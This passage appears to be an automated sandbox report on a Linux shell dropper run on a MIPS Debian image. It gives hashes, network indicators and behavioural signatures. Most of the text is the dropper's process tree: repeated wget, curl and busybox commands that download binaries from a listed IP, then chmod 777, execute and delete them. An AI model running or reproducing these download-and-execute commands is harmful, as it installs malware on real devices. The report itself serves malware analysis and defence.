[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

debian9-mipsel-20240611-en

Max time kernel

68s

Max time network

67s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

